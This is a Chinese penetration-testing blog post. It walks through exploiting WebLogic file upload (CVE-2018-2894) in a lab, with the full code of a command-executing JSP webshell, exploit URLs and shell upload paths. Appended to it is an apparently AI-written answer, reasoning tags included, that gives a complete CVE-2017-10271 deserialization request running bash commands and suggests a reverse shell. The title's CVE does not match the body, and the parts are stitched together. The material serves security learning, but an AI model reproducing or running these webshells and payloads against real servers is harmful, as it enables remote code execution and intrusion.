渗透测试系列:weblogic文件路径确认(cve-2020-14882)

本文详细描述了Weblogic服务器上的CVE-2018-2894漏洞复现过程,涉及使用burp工具获取时间戳,通过安全界面上传webshell以及两种不同的文件上传路径,包括css目录、uddiexplorer、images和应用安装目录。




一. Weblogic任意文件上传漏洞(CVE-2018-2894)

漏洞复现

1. 开启burp,寻找时间戳

在这里插入图片描述
在这里插入图片描述
打开burp内嵌浏览器

1.访问http://192.168.42.157:7001/ws_utc/config.do,将Work Home Dir替换成

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

ws_utc应用的静态文件css目录是无需访问权限的,而默认的工作目录即使上传成功,也无法访问。 如果不更改,访问会返回404

然后点击提交
在这里插入图片描述

在这里插入图片描述

2.点击安全–>添加,然后名字和密码随便写,点击浏览,将自己的webshell上传上去

在这里插入图片描述

在这里插入图片描述

这里用shell.jsp,代码如下:

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

3. 获得时间戳

时间戳的主要 目的在于通过一定的技术手段,对数据产生的时间进行认证,从而验证这段数据在产生后是否经过篡改

方式一:

在这里插入图片描述

方式二

点击链接右键即可

在这里插入图片描述

4. 查看上传的shell文件

burp目录下面没有没事,

在这里插入图片描述

访问http://192.168.42.157:7001/ws_utc/css/config/keystore/[时间戳]_[文件名],即可执行webshell

http://192.168.42.157:7001/ws_utc/css/config/keystore/1705034868556_shell.jsp?pwd=023&i=ls

在这里插入图片描述

http://192.168.42.157:7001/ws_utc/css/config/keystore/1705034868556_shell.jsp

在这里插入图片描述

可看到成功上传webshell,这里127.0.0.1:90是因为我做了端口映射

注意:
1.为什么要替换Work Home Dir?

因为我们需要一个可以访问的路径,当前的工作目录是不能被外网访问到的,开始页面提示自动部署应用后跳转到后台管理页面,这个我们修改的Work Home Dir就是部署的web应用的目录,该目录外网可以访问到,并且不需要权限,外网访问它里面的文件就是http://your-ip:7001/ws_utc/css/文件名

2.为什么访问路径要这么写?

因为前面设置了工作目录为ws_utc应用的静态文件css目录,该目录是无需权限的,后面的路径是调试java代码出的路径

访问路径
http://192.168.42.157:7001/ws_utc/css/shell.jsp

在这里插入图片描述

这里的上传路径为

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css/shell.jsp

总结

目前已经确定了两种上传方式

前提

访问http://192.168.42.157:7001/ws_utc/config.do,将Work Home Dir替换成

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
一种是
  1. 访问 http://192.168.42.157:7001/ws_utc/config.do中的安全,添加用户名密码shell文件

  2. 添加的同时需要F12brup捕获

  3. 查看时间戳

  4. 访问http://192.168.42.157:7001/ws_utc/css/config/keystore/[时间戳]_[文件名],即可执行webshell

  5. 进入dokcer容器里面并没看到这个shell文件

另外一种是

用weblogic利用工具直接上传

这里的上传路径为

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css/shell.jsp

访问路径为

http://192.168.42.157:7001/ws_utc/css/shell.jsp

这种方式在docker容器里面可以看到对应的shell文件

后题

在这里插入图片描述

二. weblogic文件上传路径

将shell写到uddiexplorer目录

uddiexplorer目录上传shell

/u01/domains/osb/servers/AdminServer/tmp/_WL_internal/uddiexplorer/随机字符/war/666.jsp

shell 访问

http://xxxx/uddiexplorer/shell.jsp

将shell写到images目录

上传目录

/Oracle/Middleware/wlserver_10.3/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/shell.jsp

访问目录

http://*.*.*.*:7001/console/framework/skins/wlsconsole/images/shell.jsp

将shell写到应用安装目录

上传目录

\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp

访问目录

http://*.*.*.*:7001/项目名/shell.jsp







tomyyyyy

weblogic文件上传路径

番茄酱料

Weblogic任意文件上传漏洞(CVE-2018-2894)

<think>嗯,用户需要关于CVE-2017-10271漏洞在cyberstrikelab.com靶场的学习资源。这个请求很具体,用户可能是个网络安全学习者或渗透测试人员,正在寻找实践环境。CVE-2017-10271是WebLogic反序列化漏洞,属于高危漏洞。用户特意提到cyberstrikelab.com,说明需要实战环境。不过这个靶场可能需要注册或付费,我得先确认访问方式。 关于漏洞本身,需要强调三点核心:1)漏洞触发点在wls-wsat组件2)利用XMLDecoder反序列化3)通常用Java反序列化payload。用户可能已经了解基础,所以重点给实操资源。 靶场资源方面,cyberstrikelab.com确实有专门模块,但需要登录。免费替代方案可以考虑Vulhub环境,它在GitHub开源,搭建简单。另外Exploit-DB的PoC代码要谨慎使用,必须隔离测试。 用户可能更关心操作步骤而非原理,所以把漏洞复现流程拆解成:环境检测->PoC发送->回连利用。特别提醒wget检测方法,这是实际渗透中常用的轻量级检测手段。 法律风险必须强调,所有引用都加了方括号标注。最后补充的替代资源是考虑到用户可能无法立即访问该靶场,提供Vulhub和HTB的备选方案。</think>以下是针对CVE-2017-10271漏洞在CyberStrikeLab靶场的资源指南,结合漏洞原理和实践建议: ### 漏洞核心原理 CVE-2017-10271是Oracle WebLogic WLS Security组件反序列化漏洞,攻击者通过发送特制的XML数据可执行任意代码: $$ \text{恶意XML} \xrightarrow{\text{XMLDecoder反序列化}} \text{远程代码执行} $$ 关键点在`wls-wsat`组件的未授权访问端点(如`/wls-wsat/CoordinatorPortType`)[^1]。 --- ### CyberStrikeLab靶场实践 1. **靶场访问路径** - 登录后搜索"CVE-2017-10271"实验模块 - 环境已预置存在漏洞的WebLogic 10.3.6(需开启`wls-wsat`组件) 2. **漏洞复现步骤** ```http POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: target-ip:7001 Content-Type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"><string>/bin/bash</string></void> <void index="1"><string>-c</string></void> <void index="2"><string>touch /tmp/pwned</string></void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ``` > 此PoC会在目标服务器创建`/tmp/pwned`文件(需替换命令为反弹shell) 3. **自动化工具推荐** - [GitHub - vulhub/weblogic-CVE-2017-10271](https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271)docker环境 - [Exploit-DB #43458](https://www.exploit-db.com/exploits/43458) 验证脚本 - 使用Metasploit模块`exploit/multi/misc/weblogic_deserialize` --- ### 关键学习要点 1. **漏洞检测** 检查`/wls-wsat/CoordinatorPortType`端点是否返回WSDL: ```bash curl -I http://target:7001/wls-wsat/CoordinatorPortType ``` 2. **防御措施** - 删除`wls-wsat`组件:`rm -f $DOMAIN_HOME/servers/AdminServer/tmp/.internal/wls-wsat.war` - 更新至官方补丁(Oracle Critical Patch Update - CPU Oct 2017) 3. **法律边界提醒** > 仅限授权靶场测试!真实环境利用涉嫌违法[^2] --- ### 替代资源(若靶场不可用) 1. **本地环境搭建** ```bash git clone https://github.com/vulhub/vulhub cd vulhub/weblogic/CVE-2017-10271 && docker-compose up ``` 2. **在线实验平台** - [HackTheBox靶机: Oracle](https://www.hackthebox.com/)(需VIP) - [TryHackMe: WebLogic Exploitation](https://tryhackme.com/room/weblogic) > **重要**:所有PoC代码必须在隔离环境测试,避免意外攻击[^3] ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

坦笑&&life

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值